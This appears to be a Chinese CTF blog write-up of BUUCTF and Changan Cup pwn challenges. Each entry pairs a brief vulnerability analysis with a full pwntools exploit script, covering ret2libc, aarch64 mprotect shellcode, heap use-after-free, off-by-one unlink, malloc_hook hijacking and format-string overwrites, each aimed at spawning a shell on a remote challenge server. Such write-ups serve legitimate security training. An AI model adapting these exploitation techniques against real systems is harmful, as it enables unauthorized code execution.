BUUCTF-pwn(14)
gwctf_2019_jiandan_pwn1
简单ret2libc,唯一需要注意的便是注意修改索引值,防止索引被覆盖!从而无法进行栈溢出!
from pwn import *
from LibcSearcher import LibcSearcher
context(os='linux',arch='amd64',log_level='debug')
binary = './pwn'
r = remote('node4.buuoj.cn',25586)
#r = process(binary)
elf = ELF(binary)
main = elf.symbols['main']
puts_plt = elf.plt['puts']
puts_got = elf.got['puts']
pop_rdi_ret = 0x0400843
start_addr = 0x004005E0
#gdb.attach(r,'b *0x0400780')
r.recvuntil("Hack 4 fun!\n")
payload = b'a'*(0x110-4)+p32(0x10d)+b'b'*8+p64(pop_rdi_ret)+p64(puts_got)+p64(puts_plt)+p64(start_addr)
r.sendline(payload)
puts_addr = u64(r.recvuntil("\x7f")[-6:].ljust(8,b'\x00'))
libc = LibcSearcher('puts',puts_addr)
libc_base = puts_addr-libc.dump('puts')
system = libc_base+libc.dump('system')
sh = libc_base+libc.dump('str_bin_sh')
#gdb.attach(r,'b *0x0400780')
payload2 = b'a'*(0x110-4)+p32(0x10d)+b'b'*8+p64(pop_rdi_ret)+p64(sh)+p64(system)
r.sendline(payload2)
success("system -> "+hex(system))
r.interactive()
shanghai2018_baby_arm
为64位动态链接的aarch64程序,程序较为简单!aarch64程序中也存在类似x86下csu_init的万能gadget
常用AARCH64指令!
BR指令:寄存器跳转
B.NE指令:向低地址跳转
MOV为寄存器之间,LDR读取内存中数据保存到寄存器,STR读取寄存器中数据保存到内存
ADRP指令获取页基址,保存到X0,add指令通过页基址+偏移获取到变量的地址
ASR #n 算术右移n 位(1≤n≤32)
LSL #n 逻辑左移n 位(1≤n≤31)
LSR #n 逻辑左移n 位(1≤n≤32)
ROR #n 循环右移n 位(1≤n≤31)
STP指令 相当于push
LDP指令 相当于pop
入栈指令和出栈指令,主要是可以操纵两个寄存器
可输入qemu-aarch64 -L /usr/aarch64-linux-gnu/ ./pwn进而运行该程序!
动态调试
首先于终端中输入qemu-aarch64 -L /usr/aarch64-linux-gnu/ -g 1234 ./pwn
此时于新终端中输入!
x0~x7:传递子程序的参数和返回值,使用时不需要保存,多余的参数用堆栈传递,64位的返回结果保存在x0中
x8:用于保存子程序的返回地址,使用时不需要保存
x9~x15:临时寄存器,也叫可变寄存器,子程序使用时不需要保存
x16~x17:子程序内部调用寄存器(IPx),使用时不需要保存,尽量不要使用
x18:平台寄存器,它的使用与平台相关,尽量不要使用
x19~x28:临时寄存器,子程序使用时必须保存
x29:帧指针寄存器(FP),用于连接栈帧,使用时必须保存
x30:链接寄存器(LR),用于保存子程序的返回地址
x31:堆栈指针寄存器(SP),用于指向每个函数的栈顶
我们可以利用万能gadget来造成利用!
我们采用mprotect函数来修改bss段上的权限,从而执行shellcode!
from pwn import *
context(log_level='debug',os='linux',arch='aarch64')
binary = './pwn'
r = remote('node4.buuoj.cn',29357)
elf = ELF(binary)
mprotect = elf.plt['mprotect']
one1 = 0x04008CC
one2 = 0x04008AC
bss_addr = 0x0411068
shellcode = p64(mprotect)+asm(shellcraft.sh())
r.recvuntil("Name:")
r.sendline(shellcode)
sleep(0.3)
payload = b'a'*0x48+p64(one1)+p64(0)+p64(one2)
payload += p64(0)+p64(1)+p64(bss_addr)+p64(0x7)+p64(0x1000)+p64(bss_addr)
payload += p64(0)+p64(bss_addr+0x8)
r.sendline(payload)
r.interactive()
picoctf_2018_are you root
分析函数,虽大但简
可以发现存在逻辑漏洞!从堆的方面来说,free释放只释放了第一块chunk,而第二块chunk并没有被释放掉,故我们利用些许思路来造成堆块重复利用!
from pwn import *
context(log_level='debug',os='linux',arch='amd64')
binary = './PicoCTF_2018_are_you_root'
r = remote('node4.buuoj.cn',25216)
#r = process(binary)
elf = ELF(binary)
def login(payload):
payload = 'login '+payload
r.sendlineafter("> ",payload)
def re_set():
r.sendlineafter("> ",'reset')
def set_auth(payload):
payload = 'set-auth '+payload
r.sendlineafter("> ",payload)
def get_glag():
r.sendlineafter("> ",'get-flag')
login('aaaaaaaa\x05')
re_set()
login('aaa')
#gdb.attach(r)
get_glag()
r.interactive()
bjdctf_2020_YDSneedGrirlfriend
分析主要函数!
Allocate申请函数!
Free释放函数!存在UAF漏洞!
本题原意,是修改程序chunk内部的函数地址为system函数地址,地址之后附加上’;/bin/sh’,此时进入Show函数可以获取权限,但是经过实践发现环境变量存在问题,故该方法不可,只能使用后门函数!
from pwn import *
context(log_level='debug',os='linux',arch='amd64')
binary = './bjdctf_2020_YDSneedGrirlfriend'
r = remote('node4.buuoj.cn',25331)
#r = process(binary)
elf = ELF(binary)
#libc = ELF('/home/pwn/pwn/glibc-all-in-one/libs/2.23-0ubuntu3_amd64/libc-2.23.so')
libc = ELF('./libc-2.23.so')
backdoor = 0x0400B9C
def Allocate(size=0x18,payload='\n'):
r.sendlineafter("Your choice :",'1')
r.sendlineafter("Her name size is :",str(size))
r.sendafter("Her name is :",payload)
def Free(index):
r.sendlineafter("Your choice :",'2')
r.sendlineafter("Index :",str(index))
def Show(index):
r.sendlineafter("Your choice :",'3')
r.sendlineafter("Index :",str(index))
Allocate(0x88)#0
Allocate(0x68)#1
Free(0)
Allocate(0x80,b'a'*8)#2
Show(2)
r.recvuntil(b'aaaaaaaa')
main_arena = u64(r.recv(6).ljust(8,b'\x00'))-88
libc_base = main_arena-0x10-libc.symbols['__malloc_hook']
system = libc_base+libc.symbols['system']
sh = libc_base+0x018cd57
Allocate()#3
Allocate()#4
Free(1)
Free(3)
Allocate(0x68)#5
Allocate(0x18,p64(backdoor)+b';/bin/sh')#4
success("main_arena -> "+hex(main_arena))
success("libc_base -> "+hex(libc_base))
#gdb.attach(r)
Show(1)
r.interactive()
actf_2019_babyheap
简单的libc2.27的UAF漏洞!
from asyncio import ALL_COMPLETED
from pwn import *
context(log_level='debug',os='linux',arch='amd64')
binary = './ACTF_2019_babyheap'
r = remote('node4.buuoj.cn',28773)
#r = process(binary)
elf = ELF(binary)
def Allocate(size=0x18,payload='\n'):
r.sendlineafter("Your choice: ",'1')
r.sendlineafter("size: \n",str(size))
r.sendafter("content: \n",payload)
def Free(index):
r.sendlineafter("Your choice: ",'2')
r.sendlineafter("list index: ",str(index))
def Show(index):
r.sendlineafter("Your choice: ",'3')
r.sendlineafter("list index: ",str(index))
system = elf.symbols['system']
sh = 0x00602010
Allocate(0x88)#0
Allocate()#1
Free(0)
Free(1)
Allocate(0x88)#2
Allocate(0x18,p64(sh)+p64(system))
#gdb.attach(r)
Show(0)
r.interactive()
picoctf_2018_buffer overflow 0
此时通过栈溢出漏洞即可获取flag!
xman_2019_format
一次输入无限格式化字符串漏洞,我们通过一次输入来得到无线次覆写地址的效果,此时我们利用ebp链来进行堆eip内容覆写为shell后门函数地址从而获取权限!
from socket import timeout
from pwn import *
context(log_level='debug',os='linux',arch='i386')
binary = './xman_2019_format'
#r = process(binary)
elf = ELF(binary)
shell_addr = 0x080485AB
#gdb.attach(r,'b *0x80485f6')
def pwn(offset):
payload = '%'+offset+'c%10$hhn'+'|%34219c%18$hn'
r.send(payload)
#pwn('2c')
#r.interactive()
for i in range(0,0x100,4):
try:
r = remote('node4.buuoj.cn',29816)
#r = process(binary)
r.recv()
pwn(str(i))
r.recv(timeout=1)
sleep(0.5)
r.sendline('cat flag')
r.interactive()
except:
r.close()
pass
gyctf_2020_signin
分析主要函数!
Allocate申请函数!
Edit编辑函数!
Free释放函数!
后门函数!
此时我们可以发现后门函数的判断条件为bss段上flag值不为0即可,libc为2.27且存在UAF漏洞,但是存在程序flags判断是否被释放,故难以造成double free利用,而Edit只能使用一次,故我们可以利用calloc的特性,优先从fastbin/smallbin中取出chunk,而malloc优先从tcache中取出chunk!
首先填充7块tcache与1块fastbin,修改fastbin的fd指针指向bss_flag-0x10,从而调用backdoor函数,calloc会取出fastbin中的第一块,而伪造的第二块会被填充到tcache中!此时我们便可以获取权限!
如果覆写got表需要两次输入,但是此时我们无法得到两次输入,故pass
如果我们直接修改tcache的fd指针为bss_flag,并申请到然后释放会触发double free的报错信息,故pass
from pwn import *
context(log_level='debug',os='linux',arch='amd64')
binary = './gyctf_2020_signin'
r = remote('node4.buuoj.cn',25660)
#r = process(binary)
elf = ELF(binary)
flag = 0x04040C0
def Allocate(index):
r.sendlineafter("your choice?",'1')
r.sendlineafter("idx?\n",str(index))
def Edit(index,payload='\n'):
r.sendlineafter("your choice?",'2')
r.sendlineafter("idx?\n",str(index))
r.send(payload)
def Free(index):
r.sendlineafter("your choice?",'3')
r.sendlineafter("idx?\n",str(index))
def Shell():
r.sendlineafter("your choice?",'6')
for i in range(8):
Allocate(i)
for i in range(8):
Free(i)
Allocate(0)
Edit(7,p64(flag-0x10))
Shell()
#gdb.attach(r)
r.interactive()
judgement_mna_2016
长安杯pwn1
该处意思为跳转到ebp-0x4地址所储存内容地址出,因已泄露eax,故可以跳转eax上地址。
此处实力眼瞎,未发觉存在后门函数,故使用ret2libc攻击手法进行攻击,相当于两次相同攻击手法,一次泄露出地址,另一次进行攻击。该方法本地通过,远程不过。故重新搜索发现存在system函数,故一次攻击到后门函数地址即可!
from pwn import *
from LibcSearcher import LibcSearcher
context(log_level='debug',os='linux',arch='i386')
binary = './pwn1'
r = remote('113.201.14.253', 16088)
#r = process(binary)
elf = ELF(binary)
printf_plt = elf.plt['printf']
printf_got = elf.got['printf']
setbuf_got = elf.got['setvbuf']
system_plt = elf.plt['system']
leave_ret = 0x08048468
start_addr = 0x08048400
ret = 0x080483a2
r.recvuntil("Gift:0x")
buf_addr = int(r.recv(8),16)
payload = p32(buf_addr)+p32(system_plt)+p32(start_addr)+p32(0x08048630)
payload = payload.ljust(0x38-0x4,b'b')+p32(buf_addr+0x8)+p32(buf_addr)+p32(leave_ret)
#gdb,attach(r)
r.sendline(payload)
#pause()
'''r.recvline()
printf_addr = u32(r.recv(4))
print(hex(printf_addr))'''
#libc = LibcSearcher('printf',printf_addr)
#libc = LibcSearcher('')
'''libc_base = printf_addr-libc.dump('printf')
system = libc_base+libc.dump('system')
sh = libc_base+libc.dump('str_bin_sh')
log.info("buf_addr -> "+hex(buf_addr))
log.info("system -> "+hex(system))
print(hex(libc_base))
print(hex(sh))
print(printf_got)'''
#gdb,attach(r)
'''r.recvuntil("Gift:0x")
new_buf_addr = int(r.recv(8),16)
print(hex(new_buf_addr))
print(p32(new_buf_addr))
payload2 = p32(new_buf_addr)+p32()+p32(0x08048630)+p32(0x08048630)+p32(0)
payload2 = payload2.ljust(0x38-0x4,b'b')+p32(new_buf_addr+0x8)+p32(new_buf_addr)+p32(leave_ret)
r.sendline(payload2)'''
r.interactive()
长安杯pwn2
分析主要函数!
Allocate申请函数
Free释放函数!
Show打印函数!
Edit编辑函数
可以看到存在off by one漏洞,当时没有首先看到,便使用unsorted bin进行泄露main_arena。但是攻击手法却没有思考到。后来发现存在off by one漏洞,故可以使用Unlink漏洞,此时我们便可以控制到main_arena-0x33处(固定手法)。但是经过实践,发现修改__malloc_hook为one_gadget无法获取权限,故可以采取间接法。首先修改__malloc_hook为__libc_realloc(不可为realloc,该两个函数地址不一样)然后修改__realloc_hook为one_gadget,此时我们可以通过修改__libc_realloc+偏移量,调整栈地址使one_gadget有效能过获取权限!
本题还是想复杂了点。其实Unlink即可泄露地址,又多操作了一步!
from pwn import *
context(log_level='debug',os='linux',arch='amd64')
binary = './pwn2'
r = remote('113.201.14.253', 16066)
#r = process(binary)
elf = ELF(binary)
libc = ELF('./libc-2.27.so')
def Allocate(size=0x18,payload='\n'):
r.sendlineafter("Choice: ",'1')
r.sendlineafter("size: ",str(size))
r.sendafter("content: ",payload)
def Edit(index,payload):
r.sendlineafter("Choice: ",'2')
r.sendlineafter("idx: ",str(index))
r.sendafter("content: ",payload)
def Free(index):
r.sendlineafter("Choice: ",'3')
r.sendlineafter("idx: ",str(index))
def Show(index):
r.sendlineafter("Choice: ",'4')
r.sendlineafter("idx: ",str(index))
one = [0x4f3d5,0x4f432,0x10a41c,0x4f2c5,0x4f322,0x10a38c]
for i in range(9):
Allocate(0x88)#0~8
Allocate()#9
Allocate(0x88)#10
Allocate(0x88)#11
for i in range(8):
Free(i)#0~7
Allocate()#0
Edit(0,b'a'*8)
Show(0)
r.recvuntil(b'aaaaaaaa')
main_arena = u64(r.recv(6).ljust(8,b'\x00'))-224
libc_base = main_arena-0x10-libc.symbols['__malloc_hook']#-0x3EBC40#-0x3EBC40#-0x10-libc.symbols['__malloc_hook']#-0x3EBC40
realloc = libc_base+libc.symbols['__libc_realloc']#+0x98C30#0x098D70
log.info("main_arena -> "+hex(main_arena))
log.info("libc_base -> "+hex(libc_base))
Allocate(0x68)#1
Free(8)#8
Free(9)#9
Allocate(0x18,b'a'*0x10+p64(0xb0)+b'\x90')#2
Free(10)#10
Allocate(0x40)#3
Allocate(0x30)#4
Allocate(0x60)#5
Free(5)#5
Edit(2,p64(main_arena-0x33))
Allocate(0x60)#5
Allocate(0x60)#6
Edit(6,b'a'*0x1b+p64(one[2]+libc_base)+p64(realloc+2))
#gdb.attach(r)
r.sendlineafter("Choice: ",'1')
r.sendlineafter("size: ",str(0x18))
r.interactive()